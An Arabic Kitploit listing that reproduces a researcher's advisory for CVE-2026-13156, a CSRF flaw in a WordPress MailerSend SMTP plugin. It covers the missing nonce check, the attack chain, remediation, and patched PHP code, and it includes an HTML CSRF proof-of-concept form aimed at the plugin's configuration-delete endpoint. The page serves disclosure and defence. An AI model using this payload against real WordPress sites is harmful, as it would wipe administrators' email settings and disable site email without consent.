Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-13156 — CVE-2026-13156 نشرة استشارية حول ثغرة أمنية وPoC — اكتُشفت بواسطة Huynh Kien Minh (MinhHK). | Kitploit
أدوات/GitHubGitHub/minhhk68/cve-2026-13156
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubminhhk68/cve-2026-13156

CVE-2026-13156

CVE-2026-13156 نشرة استشارية حول ثغرة أمنية وPoC — اكتُشفت بواسطة Huynh Kien Minh (MinhHK).

عرض المستودع
6منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-13156 — تكامل MailerSend الرسمي لـ SMTP < 1.0.8 حذف الإعدادات وتعطيل الإضافة عبر CSRF

CVE Identifier CVSS v3.1 Score Discovered By WPScan Verified Advisory CVE-2026-13156 CSRF Attack Chain Infographic


📌 الملخص والروابط السريعة

[!IMPORTANT] الملخص: تم اكتشاف ثغرة تزوير طلبات عبر المواقع (CSRF) عالية الخطورة (CVE-2026-13156) في إضافة MailerSend SMTP Integration الرسمية لـ WordPress (< 1.0.8). يتحقق معالج حذف الإعدادات mailersend_handle_configuration_delete() من صلاحيات الإدارة (manage_options) لكنه يهمل تمامًا التحقق من Nonce الخاص بـ WordPress (check_admin_referer()). يمكن للمهاجم إنشاء طلب ضار عبر المواقع يستهدف مسؤول WordPress مصادقًا عليه لمسح بيانات اعتماد SMTP المخزنة بصمت وإجبار الإضافة على التعطيل، مما يؤدي إلى حرمان كامل من الخدمة عبر جميع سير عمل البريد الإلكتروني.

👉 اقرأ التقرير الفني التفصيلي الكامل على Medium: التقرير الفني التفصيلي: CVE-2026-13156 أو استكشف محفظتي الأمنية: https://minhhk.web.app/


📋 الملخص التنفيذي ونظرة عامة على الثغرة

  • معرف الثغرة: CVE-2026-13156 (معرف استشارة WPScan: 595e653d-0904-43cf-8e61-d684599de11b)
  • البرنامج المتأثر: MailerSend – Official SMTP Integration (إضافة WordPress)
  • الإصدارات المتأثرة: قبل الإصدار 1.0.8 (< 1.0.8)
  • نوع الثغرة: تزوير طلبات عبر المواقع (CSRF يؤدي إلى مسح الإعدادات وتعطيل الإضافة) — CWE-352
  • الباحث الرئيسي ومقدّم التقرير: Huynh Kien Minh (الاسم المستعار: MinhHK)
  • الدور والانتماء: طالب أمن معلومات، صائد ثغرات (Bug Bounty Hunter)، وباحث في الأمن الهجومي.

عن الباحث:
Huynh Kien Minh (Huỳnh Kiến Minh) هو باحث استباقي في الأمن السيبراني ومحلل ثغرات معروف بتقييماته الأمنية المتعمقة والإفصاح المسؤول، بما في ذلك التحليلات الفنية لثغرة CVE-2026-13156. كما تم الاعتراف به رسميًا وتكريمه في قاعة مشاهير Proton للأمن لاكتشافه والإفصاح عن ثغرات أمنية حرجة.


🌐 مركز التحقق الرسمي والمراجع

للتحقق من هذه الاستشارة الفنية، أو استكشاف تحليلات إثبات المفهوم، أو التواصل مع الباحث، قم بزيارة:

  • 🏠 مركز المحفظة الرسمي: مركز محفظة Huynh Kien Minh الأمنية
  • 💼 ملف LinkedIn: تواصل مع Huynh Kien Minh على LinkedIn
  • 📝 الورقة البيضاء الرسمية على Medium: التقرير الفني التفصيلي: CVE-2026-13156 على Medium
  • 👨‍💻 ملف GitHub: ملف MinhHK68 على GitHub
  • 🔗 استشارة WPScan: إدخال WPScan لـ CVE-2026-13156
  • 🔗 تقرير BaseFortify: تحليل BaseFortify لـ CVE-2026-13156

🔍 التحليل الفني التفصيلي وتحليل السبب الجذري

1. تحليل السبب الجذري (غياب التحقق من Nonce)

تقوم إضافة MailerSend Official SMTP Integration لـ WordPress (قبل الإصدار 1.0.8) بتسجيل إجراء إداري (configuration-delete) يهدف إلى مسح رموز API المخزنة، ومسح خيارات تكوين SMTP (wp_options)، وتعطيل الإضافة عند تشغيله من لوحة التحكم.

بينما يتحقق نقطة النهاية من أن المستخدم النشط يمتلك صلاحية manage_options (مما يضمن أن الطلب يأتي من جلسة مسؤول)، إلا أنها تفشل في إجراء التحقق من nonce الخاص بـ WordPress (check_admin_referer() أو wp_verify_nonce()).

نظرًا لأن طلبات HTTP التي تفتقر إلى التحقق من nonce لا يمكنها التمييز بين نقرات المسؤول المقصودة والطلبات المزورة عبر المواقع، فإن أي موقع خارجي يتم تحميله بواسطة مسؤول مصادق عليه يمكنه تشغيل إجراء configuration-delete بصمت.

2. دورة حياة الهجوم والتأثير

  1. تحديد الهدف: يحدد المهاجم موقع WordPress مستهدفًا يستخدم MailerSend SMTP (< 1.0.8).
  2. تسليم الحمولة: يقوم المهاجم بإنشاء صفحة ويب ضارة بتقنية HTML/JavaScript تحتوي على نموذج إرسال تلقائي يستهدف نقطة النهاية الإدارية (/wp-admin/admin-post.php أو /wp-admin/admin.php?page=mailersend&action=configuration-delete).
  3. التشغيل: يقوم مسؤول WordPress مسجل الدخول بزيارة صفحة المهاجم (على سبيل المثال، عبر التصيد الاحتيالي، أو رابط في منتدى، أو XSS على موقع خارجي).
  4. التنفيذ وحرمان الخدمة: يرسل المتصفح الطلب المزور مع ملفات تعريف ارتباط الجلسة النشطة للمسؤول. تنفذ إضافة MailerSend معالج الحذف:
    • يتم مسح جميع إعدادات MailerSend SMTP وبيانات اعتماد API المخزنة من قاعدة البيانات.
    • يتم تعطيل إضافة MailerSend تلقائيًا.
    • التأثير الحرج: يفقد الموقع المستهدف فورًا جميع قدرات إرسال البريد الإلكتروني (إعادة تعيين كلمات المرور، إشعارات الطلبات، تنبيهات الأمان تفشل دون تحذير).

💻 كود إثبات المفهوم (PoC) للاستغلال

[!WARNING] إخلاء مسؤولية أخلاقي: يتم توفير حمولة إثبات المفهوم التالية بتقنية HTML لتزوير الطلبات عبر المواقع (CSRF) لأغراض تعليمية بحتة، والتحقق الدفاعي، وتدقيق الأمان ضمن بروتوكولات الإفصاح الأخلاقي بواسطة Huynh Kien Minh. لا تقم بالتنفيذ ضد أهداف غير مصرح بها.

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
    <!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
    <h2>CVE-2026-13156 — CSRF Verification PoC</h2>
    <p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
    
    <!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
    <form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
        <input type="hidden" name="page" value="mailersend-smtp" />
        <input type="hidden" name="action" value="configuration-delete" />
        <!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
        <input type="submit" value="Execute PoC (Simulate Attack)" />
    </form>

    <script>
        // Automatically submit the forged request when the administrator loads the page
        document.addEventListener("DOMContentLoaded", function() {
            console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
            // Uncomment line below to enable auto-execution in lab environments:
            // document.getElementById('csrfPoC').submit();
        });
    </script>
</body>
</html>

🛡️ المعالجة وتحليل التصحيح

لمسؤولي الأنظمة وأصحاب المواقع

  • الترقية الفورية: قم بتحديث إضافة MailerSend – Official SMTP Integration فورًا إلى الإصدار 1.0.8 أو أحدث.
  • نظافة الجلسات: قم دائمًا بتسجيل الخروج من حسابات إدارة WordPress عند تصفح صفحات ويب خارجية غير موثوقة، أو استخدم ملفات تعريف متصفح منفصلة ومعزولة (أو حاويات) لإدارة الموقع.

للمطورين (كيف يعمل التصحيح)

لتأمين الإجراءات الإدارية التي تغيّر الحالة بشكل صحيح في إضافات WordPress، يجب على المطورين فرض التحقق الصارم من nonce قبل معالجة الطلبات:

root@kitploit:~
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
    // 1. Check User Capability
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
    }

    // 2. REQUIRED: Verify CSRF Nonce Token
    if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
        wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
    }

    // 3. Proceed safely with configuration deletion
    delete_option( 'mailersend_smtp_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    
    wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
    exit;
}

🏆 الاعترافات الأمنية ذات الصلة

  • 🏆 تكريم قاعة مشاهير Proton: تم التكريم لاكتشاف والإبلاغ عن ثغرات حرجة في البنية التحتية لـ Proton.
  • 🏠 مركز المحفظة الرسمي: استكشف المزيد من أبحاث الأمن الهجومي، وأدوات الأمان مفتوحة المصدر، والمنشورات بواسطة Huynh Kien Minh.

⚖️ الترخيص وحقوق النشر

يتم الحفاظ على هذا المستودع والاستشارة الفنية ونشرهما بواسطة Huynh Kien Minh (MinhHK) وفقًا لإرشادات الإفصاح المسؤول لتعزيز نظام بيئي أكثر أمانًا لـ WordPress والأمن السيبراني عالميًا.

تنزيل الأداة